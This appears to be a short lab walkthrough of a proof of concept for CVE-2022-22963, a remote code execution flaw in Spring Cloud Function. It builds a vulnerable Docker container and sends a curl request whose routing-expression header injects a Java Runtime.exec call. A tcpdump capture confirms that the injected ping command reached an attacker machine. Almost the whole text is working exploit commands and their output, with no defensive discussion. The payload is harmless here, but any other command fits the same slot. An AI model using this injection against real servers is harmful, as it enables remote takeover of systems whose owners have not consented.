$ git clone https://github.com/twseptian/cve-2022-22963.git
$ cd cve-2022-22963
$ docker build . -t spring-spel-0day
$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
run ping command, and take the responses from attacker machine
$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
responses
$ sudo tcpdump icmp -i docker0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64